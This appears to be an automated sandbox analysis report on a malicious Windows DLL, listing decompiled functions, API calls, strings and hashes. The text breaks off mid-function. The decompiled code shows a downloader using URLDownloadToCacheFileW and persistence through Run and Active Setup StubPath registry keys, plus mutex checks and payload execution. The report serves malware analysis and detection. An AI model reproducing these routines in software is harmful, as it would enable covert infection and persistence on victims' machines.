API String ID: 4159136517-0
Opcode ID: 6f9064c725ce0eda676baacf6c63ec492ac870baedeada23c600b6ea1a41f5ea
Instruction ID: 394ad428024afc6b979a81fc6034fab6802de57518f58b4d3ea2d93c6a88d4c5
Opcode Fuzzy Hash: 6f9064c725ce0eda676baacf6c63ec492ac870baedeada23c600b6ea1a41f5ea
Instruction Fuzzy Hash: 98F08CF63006512BF600D3F98CC1E3B62DDFB986C1B020024B608D721ADD29EC044364

Uniqueness

Uniqueness Score: -1.00%

Function 10005F86, Relevance: 3.0, APIs: 2, Instructions: 49
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E10005F86(char __eax, void* __ebx, char __edx) {
				char _v8;
				char _v12;
				short _v534;
				void* _t18;
				intOrPtr _t32;
				void* _t36;

				_v12 = __edx;
				_v8 = __eax;
				E10003C28( &_v8);
				E10003C28( &_v12);
				_push(_t36);
				_push(0x10006016);
				_push( *[fs:eax]);
				 *[fs:eax] = _t36 + 0xfffffdec;
				_push(0);
				_push(0x10);
				_push(0x104);
				_push( &_v534);
				_t18 = E1000390C(_v8);
				_push(_t18);
				_push(0);
				L10005F80();
				if(_t18 == 0) {
					CopyFileW( &_v534, E1000390C(_v12), 0);
					asm("sbb ebx, ebx");
				}
				_pop(_t32);
				 *[fs:eax] = _t32;
				_push(E1000601D);
				return E10003788( &_v12, 2);
			}

0x10005f92
0x10005f95
0x10005f9b
0x10005fa3
0x10005faa
0x10005fab
0x10005fb0
0x10005fb3
0x10005fb6
0x10005fb8
0x10005fba
0x10005fc5
0x10005fc9
0x10005fce
0x10005fcf
0x10005fd1
0x10005fd8
0x10005fec
0x10005ff4
0x10005ff6
0x10005ffd
0x10006000
0x10006003
0x10006015

APIs

Part of subcall function 10003C28: SysAllocStringLen.OLEAUT32(CONFIG,?), ref: 10003C36

URLDownloadToCacheFileW.URLMON(00000000,00000000,?,00000104,00000010,00000000), ref: 10005FD1
CopyFileW.KERNEL32(?,00000000,00000000,00000000,10006016), ref: 10005FEC

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$AllocCacheCopyDownloadString
String ID:
API String ID: 2397740412-0
Opcode ID: 4a77a2e6e5b60fd12bd9e17b935437ef89a8161801deff5e08ca33a82e0ce24b
Instruction ID: 518c37ad459ba6dfeec1cc82918b9415ec9692cdfa9117b24deab1163ccdcd4a
Opcode Fuzzy Hash: 4a77a2e6e5b60fd12bd9e17b935437ef89a8161801deff5e08ca33a82e0ce24b
Instruction Fuzzy Hash: 4D018474544208BEF711DB64CC82FEFBBECDB08780F904572F504E6196EB75AA549A50

Uniqueness

Uniqueness Score: -1.00%

Function 10006B14, Relevance: 1.6, APIs: 1, Instructions: 148timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,00000000,10006CD2,?,?,?,?,00000000,00000000,0000003A,?,1000C3BA,?,.dat,?,1000C958), ref: 10006B42

Part of subcall function 10003788: SysFreeString.OLEAUT32(?), ref: 1000379B

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeLocalStringTime
String ID:
API String ID: 4115487899-0
Opcode ID: 080143b38f47a14bc7abd16a6aa459c922e841604fcb300ac30b8a9b522506b0
Instruction ID: 6c50818c357f400c33ad67fb0aa65d9f8c3d174c8eb37c65fd316cc4577b83bf
Opcode Fuzzy Hash: 080143b38f47a14bc7abd16a6aa459c922e841604fcb300ac30b8a9b522506b0
Instruction Fuzzy Hash: E051F17890405DABFB05DB94CC41DFFB7BBEF89380FA08066F440B6259DE35AE458A60

Uniqueness

Uniqueness Score: -1.00%

Function 1000649C, Relevance: 1.6, APIs: 1, Instructions: 53nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 10006507

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: a36e2596e50cbdcff5ffa68e6a1e7b8638978eb7ec4bb7942f87b3b5f9b64d97
Instruction ID: d91e40c9a86a1603bffb38651a5b716410016987c82cb3399e660d7322f9702c
Opcode Fuzzy Hash: a36e2596e50cbdcff5ffa68e6a1e7b8638978eb7ec4bb7942f87b3b5f9b64d97
Instruction Fuzzy Hash: 23014B7A80E3C55FC703DF7898A55413FB9AE5B24070F04D7E484CF0A3E6685858CB62

Uniqueness

Uniqueness Score: -1.00%

Function 10004A84, Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,10004AEA), ref: 10004AAA

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: efe5643a6653c0d33cbe588f2399e79e61fc0be940d45b1ddb6cbc9784bd52bb
Instruction ID: a6b1d0fb2cc725cd67dae8327f47cbfeb89b8e8f14ee4b1b67c3bb55e1ee9b21
Opcode Fuzzy Hash: efe5643a6653c0d33cbe588f2399e79e61fc0be940d45b1ddb6cbc9784bd52bb
Instruction Fuzzy Hash: F8F0C274A08209AFFB01DEA1CC51AEFB3BAFB85350F40C835E11066588EBB43A04C695

Uniqueness

Uniqueness Score: -1.00%

Function 1000AF50, Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 1000AF81

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: d3956dd715256d4decada7e69221bfc1ce5d5ef765fdf7dd91a78ac1ce545737
Instruction ID: 8e78343bb29869cc51209ea075ef4b030323b4b60e46301b02e33cef73b8dc7b
Opcode Fuzzy Hash: d3956dd715256d4decada7e69221bfc1ce5d5ef765fdf7dd91a78ac1ce545737
Instruction Fuzzy Hash: 0DE0EDB67051905FA711CAAE98C486ABBEDDF8A19130981A6F548CB21AC664EC418760

Uniqueness

Uniqueness Score: -1.00%

Function 100064F4, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 10006507

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 91a85faddc0a6b7c48ccd8513a21e82de454515e62290299adcaadae15e2c70d
Instruction ID: 436466b3821b95b6b86dd239864fdc8ccfeb13c66957006ad6da2fca92e58a32
Opcode Fuzzy Hash: 91a85faddc0a6b7c48ccd8513a21e82de454515e62290299adcaadae15e2c70d
Instruction Fuzzy Hash: A1D002BA20420DAF8B40DEDDEC81E9B33ECAB0C650B008411BA18C7205CA70F9609B75

Uniqueness

Uniqueness Score: -1.00%

Function 10048CE7, Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65e1b0b0bfc971ea17c953731613e9d38bff3bc8381f0b4d43f7e2df5469c182
Instruction ID: c2155be9a22ec35cc72a5576a491537a18d16551030b1ccac5dfc047acf1e890
Opcode Fuzzy Hash: 65e1b0b0bfc971ea17c953731613e9d38bff3bc8381f0b4d43f7e2df5469c182
Instruction Fuzzy Hash: 60519D6150E7D09FC7138BB48C696827FB0AF17214B0E49DBD4C18F8A3E258681AD723

Uniqueness

Uniqueness Score: -1.00%

Function 10048F11, Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 051106af2b34cd8f61e02f315e16c27509e72fe1c943acd15263117665369d96
Instruction ID: 045499a1225f0b0c77b71ec5cad36c083544a06841ea1a5221bd3b2b54e25d63
Opcode Fuzzy Hash: 051106af2b34cd8f61e02f315e16c27509e72fe1c943acd15263117665369d96
Instruction Fuzzy Hash: 0041249428E3C49FC32787B10CBE281BFA16D47008B5988EFDAC54ACA3D515251FCB27

Uniqueness

Uniqueness Score: -1.00%

Function 100486C1, Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69ba89bcd680b66bd704abd3acc838314031b346093b05974a042093b8111a6c
Instruction ID: 882b185211b792b8c5052c84d649f19989d8332f3aceee9526a096d5013ac9ab
Opcode Fuzzy Hash: 69ba89bcd680b66bd704abd3acc838314031b346093b05974a042093b8111a6c
Instruction Fuzzy Hash: D441029429E3C49FC32787B50CBE281BFA16D47008B5988EFDAD14ADA3D515291FCB27

Uniqueness

Uniqueness Score: -1.00%

Function 10048E4D, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fec516accf8aee0f52b093b2999d0238f6fe2619349a957812e2857e0ca0752a
Instruction ID: fb9c58e4edd8cd6f8191b68a5e242de076d7f94a0d77c4bc5c89148ebc96a7aa
Opcode Fuzzy Hash: fec516accf8aee0f52b093b2999d0238f6fe2619349a957812e2857e0ca0752a
Instruction Fuzzy Hash: 2D210A7005D7C09FC723CBB4C8A9502BFF0BF5B20474988CFC9968B8A2D625A425DB13

Uniqueness

Uniqueness Score: -1.00%

Function 1000C9D0, Relevance: 72.0, APIs: 23, Strings: 18, Instructions: 235
librarysleepCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E1000C9D0(intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				void* _v80;
				char _v84;
				char _v88;
				WCHAR* _t103;
				void* _t116;
				void* _t128;
				intOrPtr _t171;
				void* _t172;
				char* _t198;
				void* _t208;
				short* _t211;
				void* _t212;
				void* _t213;
				intOrPtr _t215;

				_t172 = 0xa;
				goto L1;
				while(1) {
					L5:
					_t219 =  *((char*)(_t171 + 0xdbc)) - 1;
					if( *((char*)(_t171 + 0xdbc)) == 1) {
						E100038E0( &_v76, 0x3d, _t171 + 0xc4e);
						E1000577C(0x80000002, _t171, _v76, _v28, _t212, _t219, 2, _v16);
					}
					_t220 =  *((char*)(_t171 + 0xdbd)) - 1;
					if( *((char*)(_t171 + 0xdbd)) == 1) {
						E100038E0( &_v80, 0x3d, _t171 + 0xcc8);
						_t184 = _v80;
						E1000577C(0x80000001, _t171, _v80, _v28, _t212, _t220, 2, _v16);
					}
					_t221 =  *((char*)(_t171 + 0xdbe)) - 1;
					if( *((char*)(_t171 + 0xdbe)) == 1) {
						SHDeleteKeyW(0x80000001, E1000390C(_v20));
						_t184 = L"StubPath";
						E1000577C(0x80000002, _t171, L"StubPath", _v20, _t212, _t221, 2, _v16);
					}
					_t211 = E1000390C(_v16);
					_t128 = E10005CA4(_t211);
					_t222 = _t128;
					if(_t128 == 0) {
						E10005D78(_v16, _t171, _t184,  &_v84, _t211, _t212, _t222);
						if(E10005690(E1000390C(_v84)) != 0) {
							_push(_v40);
							_push(_v44);
							_t208 = E1000390C(_v24);
							E10005EB4(_t211, _t208);
							_t224 =  *((char*)(_t171 + 0xbd1)) - 1;
							if( *((char*)(_t171 + 0xbd1)) == 1) {
								E10005D78(_v16, _t171, _t184,  &_v88, _t211, _t212, _t224);
								E10005F1C(_v88, _t171, _t184, _t212);
								E10005F1C(_v16, _t171, _t184, _t212);
							}
						}
					}
					_t213 = E10004DF0(0, 0, _t171 + 0xfaa);
					if(GetLastError() == 0xb7) {
						CloseHandle(_t213);
					} else {
						CloseHandle(_t213);
						ShellExecuteW(0, L"open", _t211, 0, 0, "jjj");
					}
					Sleep(0x1388);
					_t212 = E10004DF0(0, 0, _t171 + 0x1024);
					if(GetLastError() != 0xb7) {
						CloseHandle(_t212);
					} else {
						ExitProcess(0);
					}
				}
				L3:
				E100034B0( &_v56, 0x3d, _t171 + 0xfaa);
				E1000352C( &_v52, _v56, "SOFTWARE\\");
				E100038FC( &_v48, _v52);
				E1000553C(0x80000001, _t171, L"ServerName", _v48, _t212,  &_v16, 0);
				Sleep(0x3e8);
				E10003A34(_v16, 0);
				if(0 == 0) {
					goto L3;
				} else {
					E100034B0( &_v64, 0x3d, _t171 + 0xfaa);
					E1000352C( &_v60, _v64, "SOFTWARE\\");
					E100038FC( &_v8, _v60);
					E100037D0( &_v12, L"ServerName");
					_t103 = E1000390C(_v12);
					SHDeleteValueW(0x80000001, E1000390C(_v8), _t103);
					E100037D0( &_v28, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run");
					E100034B0( &_v72, 0x3d, _t171 + 0xd42);
					E1000352C( &_v68, _v72, "Software\\Microsoft\\Active Setup\\Installed Components\\");
					E100038FC( &_v20, _v68);
					_t116 = E1000390C(_v16);
					_t198 =  &_v32;
					_v44 = E10005E30(_t116, _t198);
					_v40 = _t198;
					E10003BE4( &_v24, E10003FD4(_v44, _v40, 2, 0));
					E100050D0(E1000390C(_v24), _v32);
					goto L5;
				}
				L1:
				_push(0);
				_push(0);
				_t172 = _t172 - 1;
				if(_t172 != 0) {
					goto L1;
				} else {
					_push(_t172);
					_push(_t212);
					_t171 = _a4;
					_push(0x1000cd6b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t215;
					LoadLibraryA("advapi32.dll");
					LoadLibraryA("kernel32.dll");
					LoadLibraryA("shell32.dll");
					LoadLibraryA("mpr.dll");
					LoadLibraryA("version.dll");
					LoadLibraryA("comctl32.dll");
					LoadLibraryA("gdi32.dll");
					LoadLibraryA("opengl32.dll");
					LoadLibraryA("user32.dll");
					LoadLibraryA("wintrust.dll");
					LoadLibraryA("msimg32.dll");
					LoadLibraryA("shell32.dll");
					E10004DF0(0, 0, _t171 + 0x109e);
					goto L3;
				}
			}

0x1000c9d3
0x1000c9d3
0x1000cbac
0x1000cbac
0x1000cbac
0x1000cbb3
0x1000cbc9
0x1000cbd9
0x1000cbd9
0x1000cbde
0x1000cbe5
0x1000cbfb
0x1000cc00
0x1000cc0b
0x1000cc0b
0x1000cc10
0x1000cc17
0x1000cc27
0x1000cc32
0x1000cc3f
0x1000cc3f
0x1000cc4c
0x1000cc50
0x1000cc55
0x1000cc57
0x1000cc5f
0x1000cc73
0x1000cc75
0x1000cc78
0x1000cc86
0x1000cc87
0x1000cc8c
0x1000cc93
0x1000cc9b
0x1000cca3
0x1000ccab
0x1000ccab
0x1000cc93
0x1000cc73
0x1000ccc0
0x1000cccc
0x1000ccea
0x1000ccce
0x1000cccf
0x1000cce2
0x1000cce2
0x1000ccf4
0x1000cd09
0x1000cd15
0x1000cd24
0x1000cd17
0x1000cd19
0x1000cd19
0x1000cd15
0x1000ca7c
0x1000ca90
0x1000caa0
0x1000caab
0x1000cabd
0x1000cac7
0x1000cad1
0x1000cad6
0x00000000
0x1000cad8
0x1000cae6
0x1000caf6
0x1000cb01
0x1000cb0e
0x1000cb16
0x1000cb2a
0x1000cb37
0x1000cb4a
0x1000cb5a
0x1000cb65
0x1000cb6d
0x1000cb72
0x1000cb7a
0x1000cb7d
0x1000cb94
0x1000cba7
0x00000000
0x1000cba7
0x1000c9d8
0x1000c9d8
0x1000c9da
0x1000c9dc
0x1000c9dd
0x00000000
0x1000c9df
0x1000c9df
0x1000c9e1
0x1000c9e3
0x1000c9e9
0x1000c9ee
0x1000c9f1
0x1000c9f9
0x1000ca03
0x1000ca0d
0x1000ca17
0x1000ca21
0x1000ca2b
0x1000ca35
0x1000ca3f
0x1000ca49
0x1000ca53
0x1000ca5d
0x1000ca67
0x1000ca77
0x00000000
0x1000ca77

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000000,1000CD6B,?,?,?,?,00000009,00000000,00000000), ref: 1000C9F9
LoadLibraryA.KERNEL32(kernel32.dll,advapi32.dll,00000000,1000CD6B,?,?,?,?,00000009,00000000,00000000), ref: 1000CA03
LoadLibraryA.KERNEL32(shell32.dll,kernel32.dll,advapi32.dll,00000000,1000CD6B,?,?,?,?,00000009,00000000,00000000), ref: 1000CA0D
LoadLibraryA.KERNEL32(mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000CD6B,?,?,?,?,00000009,00000000,00000000), ref: 1000CA17
LoadLibraryA.KERNEL32(version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000CD6B,?,?,?,?,00000009,00000000,00000000), ref: 1000CA21
LoadLibraryA.KERNEL32(comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000CD6B,?,?,?,?,00000009,00000000,00000000), ref: 1000CA2B
LoadLibraryA.KERNEL32(gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000CD6B,?,?,?,?,00000009,00000000,00000000), ref: 1000CA35
LoadLibraryA.KERNEL32(opengl32.dll,gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000CD6B,?,?,?,?,00000009,00000000), ref: 1000CA3F
LoadLibraryA.KERNEL32(user32.dll,opengl32.dll,gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000CD6B,?,?,?,?,00000009), ref: 1000CA49
LoadLibraryA.KERNEL32(wintrust.dll,user32.dll,opengl32.dll,gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000CD6B), ref: 1000CA53
LoadLibraryA.KERNEL32(msimg32.dll,wintrust.dll,user32.dll,opengl32.dll,gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000CD6B), ref: 1000CA5D
LoadLibraryA.KERNEL32(shell32.dll,msimg32.dll,wintrust.dll,user32.dll,opengl32.dll,gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000CD6B), ref: 1000CA67
Sleep.KERNEL32(000003E8,?,00000000,00000000,00000000,?,shell32.dll,msimg32.dll,wintrust.dll,user32.dll,opengl32.dll,gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll), ref: 1000CAC7
SHDeleteValueW.SHLWAPI(80000001,00000000,00000000,000003E8,?,00000000,00000000,00000000,?,shell32.dll,msimg32.dll,wintrust.dll,user32.dll,opengl32.dll,gdi32.dll,comctl32.dll), ref: 1000CB2A

Part of subcall function 10005E30: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E67
Part of subcall function 10005E30: GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E71
Part of subcall function 10005E30: ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E99
Part of subcall function 10005E30: CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E9F

SHDeleteKeyW.SHLWAPI(80000001,00000000,00000002,?,00000002,?,00000000,00000000,00000000,?,00001388,00000000,00000000,00000000,?), ref: 1000CC27
GetLastError.KERNEL32(00000000,00000000,?), ref: 1000CCC2
CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,00000002,?,80000001,00000000,00000002,?,00000002,?,00000000,00000000), ref: 1000CCCF
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 1000CCE2
CloseHandle.KERNEL32(00000000,00000000,00000000,?), ref: 1000CCEA
Sleep.KERNEL32(00001388,00000000,00000000,00000000,?), ref: 1000CCF4
GetLastError.KERNEL32(00000000,00000000,?,00001388,00000000,00000000,00000000,?), ref: 1000CD0B
ExitProcess.KERNEL32(00000000,00000000,00000000,?,00001388,00000000,open,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000CD19

Part of subcall function 1000577C: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 100057C2
Part of subcall function 1000577C: RegSetValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,10005825,?,1000F834), ref: 100057EE
Part of subcall function 1000577C: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,00000000,00000000,10005825,?,1000F834), ref: 100057FD

CloseHandle.KERNEL32(00000000,00000000,00000000,?,00001388,00000000,00000000,00000000,?), ref: 1000CD24

Strings

StubPath, xrefs: 1000CC32
opengl32.dll, xrefs: 1000CA3A
kernel32.dll, xrefs: 1000C9FE
wintrust.dll, xrefs: 1000CA4E
open, xrefs: 1000CCDB
ServerName, xrefs: 1000CAB3, 1000CB09
msimg32.dll, xrefs: 1000CA58
version.dll, xrefs: 1000CA1C
mpr.dll, xrefs: 1000CA12
jjj, xrefs: 1000CCD4
comctl32.dll, xrefs: 1000CA26
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 1000CB32
advapi32.dll, xrefs: 1000C9F4
shell32.dll, xrefs: 1000CA08, 1000CA62
user32.dll, xrefs: 1000CA44
Software\Microsoft\Active Setup\Installed Components\, xrefs: 1000CB55
SOFTWARE\, xrefs: 1000CA9B, 1000CAF1
gdi32.dll, xrefs: 1000CA30

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad$Close$Handle$File$CreateDeleteErrorLastSleepValue$ExecuteExitProcessReadShellSize
String ID: SOFTWARE\$ServerName$Software\Microsoft\Active Setup\Installed Components\$Software\Microsoft\Windows\CurrentVersion\Run$StubPath$advapi32.dll$comctl32.dll$gdi32.dll$jjj$kernel32.dll$mpr.dll$msimg32.dll$open$opengl32.dll$shell32.dll$user32.dll$version.dll$wintrust.dll
API String ID: 570719760-3930227570
Opcode ID: 80134d6693af9d9d1c102747081ac19f927ab45dec72332da694b67f7ee99457
Instruction ID: 2f4b2620837c28cfdf5e49335ff29dada521f5c21c6ac21027946eb6f57ed48d
Opcode Fuzzy Hash: 80134d6693af9d9d1c102747081ac19f927ab45dec72332da694b67f7ee99457
Instruction Fuzzy Hash: 20911F78A4024DABFB01EBA4D882FDE7779EF442C1F118162F9046B28ECB75BD058765

Uniqueness

Uniqueness Score: -1.00%

Function 1000C080, Relevance: 66.9, APIs: 19, Strings: 19, Instructions: 445
librarysleepfileCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E1000C080(void* __ebx, void* __edi, void* __esi, WCHAR* _a4) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				char _v28;
				char _v40;
				char _v162;
				char _v164;
				intOrPtr _v168;
				char _v290;
				char _v412;
				char _v534;
				char _v656;
				char _v658;
				char _v659;
				char _v660;
				char _v1026;
				char _v1028;
				char _v2011;
				char _v2012;
				void _v5036;
				char _v5040;
				char _v5564;
				char _v5568;
				char _v5572;
				char _v5576;
				char _v5580;
				char _v5584;
				char _v5588;
				char _v5592;
				char _v5596;
				char _v5600;
				char _v5604;
				char _v5608;
				char _v5612;
				char _v5616;
				char _v5620;
				char _v5624;
				char _v5628;
				char _v5632;
				char _v5636;
				char _v5640;
				char _v5644;
				char _v5648;
				char _v5652;
				char _v5656;
				char _v5660;
				char _v5664;
				char _v5668;
				char _v5672;
				char _v5676;
				void* _t164;
				intOrPtr _t207;
				intOrPtr _t209;
				char* _t211;
				intOrPtr _t212;
				intOrPtr _t214;
				intOrPtr _t216;
				intOrPtr* _t218;
				char* _t219;
